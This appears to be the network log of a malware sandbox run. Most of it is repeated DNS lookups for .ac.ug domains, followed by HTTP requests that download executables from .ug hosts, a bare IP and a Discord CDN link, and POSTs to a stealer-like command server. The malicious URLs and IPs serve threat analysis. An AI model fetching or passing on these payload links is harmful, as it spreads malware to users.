Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentttt.ac.ugIN AResponseagentttt.ac.ugIN A79.134.225.40
-
Remote address:8.8.8.8:53Requestagentttt.ac.ugIN AResponseagentttt.ac.ugIN A79.134.225.40
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requesttaenaia.ac.ugIN AResponsetaenaia.ac.ugIN A185.140.53.149
-
Requesttaenaia.ac.ugIN AResponsetaenaia.ac.ugIN A185.140.53.149
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN A
-
Requestagentpurple.ac.ugIN A
-
Requestagentpurple.ac.ugIN A
-
Requestagentpurple.ac.ugIN A
-
Requestagentpurple.ac.ugIN A
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN A
-
Requestagentpapple.ac.ugIN A
-
Requestagentpapple.ac.ugIN A
-
Requestagentpapple.ac.ugIN A
-
Requestagentpapple.ac.ugIN A
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentttt.ac.ugIN AResponseagentttt.ac.ugIN A79.134.225.40
-
Requestagentttt.ac.ugIN AResponseagentttt.ac.ugIN A79.134.225.40
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requesttaenaia.ac.ugIN AResponsetaenaia.ac.ugIN A185.140.53.149
-
Requesttaenaia.ac.ugIN AResponsetaenaia.ac.ugIN A185.140.53.149
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpurple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
Requestagentpapple.ac.ugIN AResponse
-
291 B 663 B 5 3
HTTP Request
GET http://bit.do/fqhJD
HTTP Response
301
-
291 B 659 B 5 3
HTTP Request
GET http://bit.do/fqhHT
HTTP Response
301
-
343 B 1.3kB 6 4
HTTP Request
GET http://bit.do/fqhJv
HTTP Response
301
-
21.6kB 1.4MB 469 926
HTTP Request
GET http://agentt.ac.ug/zxcv.EXE
HTTP Response
200
-
21.6kB 1.4MB 469 926
HTTP Request
GET http://nicolas.ug/zxcv.EXE
HTTP Response
200
-
18.9kB 1.2MB 410 809
HTTP Request
GET http://courtneyjones.ac.ug/zxcvb.exe
HTTP Response
200
-
929 B 9.3kB 10 11
HTTP Request
GET https://telete.in/brikitiki
HTTP Response
200
-
674.8kB 3.9MB 1778 3068
HTTP Request
POST https://puffpuff423.top/
HTTP Response
200
HTTP Request
GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/bcbf9f6936f09f7df8ccdf9dc95fc3b52a1eda94
HTTP Response
200
HTTP Request
GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/40379fe9d51fb061375f46f04a94c950dfbe51d2
HTTP Response
200
HTTP Request
POST https://puffpuff423.top/
HTTP Response
200
-
541 B 399 B 6 4
HTTP Request
POST http://jamesrlongacre.ug/index.php
HTTP Response
200
-
170.9kB 3.1MB 2158 2128
HTTP Request
POST http://morasergiov.ac.ug/softokn3.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/sqlite3.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/freebl3.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/mozglue.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/msvcp140.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/nss3.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/vcruntime140.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/main.php
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/
HTTP Response
200
-
35.4kB 2.2MB 761 1480
HTTP Request
GET http://217.8.117.77/ac.exe
HTTP Response
200
HTTP Request
GET http://217.8.117.77/rc.exe
HTTP Response
200
HTTP Request
GET http://217.8.117.77/ds1.exe
HTTP Response
200
HTTP Request
GET http://217.8.117.77/ds2.exe
HTTP Response
200
-
162.159.133.233:443
https://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123
tls, http
FcIiEO8Bol.exe
20.4kB 627.4kB 434 427
HTTP Request
GET https://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123
HTTP Response
200
-
11.1kB 702.2kB 239 471
HTTP Request
GET http://217.8.117.77/axcjgfhwvvas.exe
HTTP Response
200
-
1.1kB 9.5kB 13 15
HTTP Request
GET https://telete.in/brikitiki
HTTP Response
200
-
632.9kB 3.9MB 1811 3143
HTTP Request
POST https://puffpuff423.top/
HTTP Response
200
HTTP Request
GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/5eff69acfa0ae85a06df5a3b7662e7645e0e93cc
HTTP Response
200
HTTP Request
GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/fe8440f113bcec360cc6d6436c325f46774cadf6
HTTP Response
200
HTTP Request
POST https://puffpuff423.top/
HTTP Response
200
-
11.9kB 743.5kB 258 506
HTTP Request
GET http://217.8.117.77/oscjgfhwvvas.exe
HTTP Response
200
-
8.8kB 531.0kB 189 364
HTTP Request
GET http://217.8.117.77/ac.exe
HTTP Response
200
-
541 B 399 B 6 4
HTTP Request
POST http://jamesrlongacre.ug/index.php
HTTP Response
200
-
14.9kB 909.1kB 321 617
HTTP Request
GET http://217.8.117.77/rc.exe
HTTP Response
200
-
6.2kB 366.8kB 133 251
HTTP Request
GET http://217.8.117.77/ds1.exe
HTTP Response
200
-
6.9kB 408.4kB 147 280
HTTP Request
GET http://217.8.117.77/ds2.exe
HTTP Response
200
-
158.8kB 3.1MB 2144 2104
HTTP Request
POST http://morasergiov.ac.ug/softokn3.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/sqlite3.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/freebl3.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/mozglue.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/msvcp140.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/nss3.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/vcruntime140.dll
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/main.php
HTTP Response
200
HTTP Request
POST http://morasergiov.ac.ug/
HTTP Response
200
-
162.159.133.233:443
https://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123
tls, http
eJZoW1GjJt.exe
20.8kB 627.9kB 442 440
HTTP Request
GET https://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123
HTTP Response
200
-
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
126 B 252 B 2 2
DNS Request
agentpapple.ac.ug
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug